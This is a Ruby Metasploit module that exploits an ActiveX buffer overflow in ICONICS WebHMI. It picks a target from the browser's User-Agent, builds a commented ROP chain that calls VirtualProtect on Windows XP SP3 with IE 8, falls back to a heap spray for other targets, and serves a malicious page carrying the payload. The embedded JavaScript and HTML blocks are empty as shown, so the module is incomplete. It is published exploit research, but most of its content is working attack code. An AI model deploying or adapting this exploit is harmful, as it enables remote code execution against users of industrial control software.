## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "ICONICS WebHMI ActiveX Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in ICONICS WebHMI's ActiveX control. By supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll fails to do any proper bounds checking before this input is copied onto the stack, which causes a buffer overflow, and results arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Version' => "$Revision$", 'Author' => [ 'Scoot Bell ', 'Blair Strang ', 'sinn3r', #Metasploit port ], 'References' => [ ['OSVDB', '72135'], ['URL', 'http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf'], ['EDB', 17240], ['URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-080-02.pdf'] ], 'Payload' => { 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'DefaultOptions' => { 'EXITFUNC' => "seh", 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 6/7/8 on Windows XP SP3', { 'Offset' => 510, #Offset to where ROP gadgets begin 'Ret' => 0x770167b0, #PUSH ESP; POP EBP; RETN 8 'Max' => 4500, #Max buffer size used }, ], [ 'IE 7 on Windows Vista', { 'Ret' => 0x0c0c0c0c, #Target spray 'blockSize' => "0x1000", 'spraySize' => "0x8500", 'Max' => 4500, }, ], ], 'Privileged' => false, 'DisclosureDate' => "May 5 2011", 'DefaultTarget' => 0)) end def junk return rand_text(4).unpack("L")[0].to_i end def repeat(addr, rep) arr = [] rep.times { arr << addr } return arr end def on_request_uri(cli, request) my_target = '' agent = request.headers['User-Agent'] if agent =~ /NT 5\.1/ and agent =~ /MSIE (6|7)\.\d/ my_target = targets[2] elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.\d/ my_target = targets[2] elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/ my_target = targets[1] else send_not_found(cli) print_error("Unknown User-Agent") return end js = '' sploit = '' if my_target['spraySize'] == nil #ROP tekniq is only used against IE 8 + XP SP3 (ENG), since the gadgets are specific #to the service pack (non or fully patched) rop_gadgets = [ my_target.ret, junk, 0x7e45c67f, #XCHG EAX,EBP; RETN (USER32.dll) repeat(junk, 2), 0x7e440639, #ADD ESP,10; POP EDI; POP ESI; POP EBX; RETN USER32.dll 0x7c801ad4, #Kernel32.VirtualProtect junk, #Initial ESP + 8 p1 = retaddr junk, #p2 - lpaddr junk, #p3 - size junk, #p4 - perms junk, #p5 - oldperms junk, #Return address 0x7e4462ed, #XCHG EAX,ECX; RETN (USER32.dll) 0x7c902b50, #MOV EDX, ECX; RETN (ntdll.dll) repeat(0x77aa2d96, 20), #INC ECX * 21 (CRYPT32.dll) 0x7c901726, #MOV EAX, EDX; RETN (ntdll.dll) repeat(0x5b86a17b, 2), #ADD EAX,7B; RETN * 2 (NETAPI32.dll) repeat(0x77c34fbd, 2), #ADD EAX,5C; RETN * 2 (msvcrt.dll) 0x7E76EA74, #MOV DWORD PTR DS:[ECX],EAX; RETN (SXS.dll) #Shellcode pointer repeat(0x77aa2d96, 4), #INC ECX * 4 (CRYPT32.dll) 0x7E76EA74, #MOV DWORD PTR DS:[ECX],EAX; RETN (SXS.dll) #Size (0x400 bytes) repeat(0x77aa2d96, 4), #INC ECX * 4 (CRYPT32.dll) 0x7e721a99, #POP EAX; RETN (SXS.dll) 0x3BFFF9CB, #Value to XOR 0x7e7560b5, #XOR EAX,3bfffdcb (SXS.dll) 0x7E76EA74, #MOV DWORD PTR DS:[ECX],EAX; RETN (RPCRT4.dll) #NewProtect repeat(0x77aa2d96, 4), #INC ECX * 4 (CRYPT32.dll) 0x7E456160, #XOR EAX,EAX; RETN (USER32.dll) 0x7E4193BA, #ADD AL,3B (USER32.dll) repeat(0x7E442074, 5), #INC EAX; RETN (USER32.dll) 0x7E76EA74, #MOV DWORD PTR DS:[ECX],EAX; RETN (USER32.dll) #OldProtect repeat(0x77aa2d96, 4), #INC ECX * 4 (CRYPT32.dll) 0x7e721a99, #POP EAX (SXS.dll) 0x10010570, #EAX (Wriable memory) 0x7E76EA74, #MOV DWORD PTR DS:[ECX],EAX; RETN (USER32.dll) #Call VirtualProtect repeat(0x7E421AAF, 20), #DEC ECX; RETN (USER32.dll) 0x7E4462ED, #XCHG EAX,ECX; RETN (USER32.dll) 0x7E45F257, #XCHG EAX,ESP; RETN (USER32.dll) repeat(junk, 2), #Align shellcode ].flatten.pack('V*') sploit << Rex::Text.to_unescape(rand_text_alpha(my_target['Offset']), Rex::Arch.endian(target.arch)) sploit << Rex::Text.to_unescape(rop_gadgets, Rex::Arch.endian(target.arch)) sploit << Rex::Text.to_unescape(make_nops(80), Rex::Arch.endian(target.arch)) sploit << Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) sploit << rand_text_alpha(my_target['Max']-sploit.length) else #If we don't have to ROP, then we just spray against the rest of the targets shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) target_ret = [my_target.ret].pack('V') nops = Rex::Text.to_unescape(target_ret*4, Rex::Arch.endian(target.arch)) sploit << Rex::Text.to_unescape(target_ret * (my_target['Max'] / 4), Rex::Arch.endian(target.arch)) js_func_name = rand_text_alpha(rand(6) + 3) js_var_blocks_name = rand_text_alpha(rand(6) + 3) js_var_shell_name = rand_text_alpha(rand(6) + 3) js_var_nopsled_name = rand_text_alpha(rand(6) + 3) js_var_index_name = rand_text_alpha(rand(6) + 3) js = <<-EOS EOS end obj_id = rand_text_alpha(rand(6) + 3) sploit_name = rand_text_alpha(rand(6) + 3) html = <<-EOS #{js} EOS html = html.gsub(/^\t\t/, "") print_status("Sending malicious page") send_response(cli, html, {'Content-Type'=>'text/html'}) end end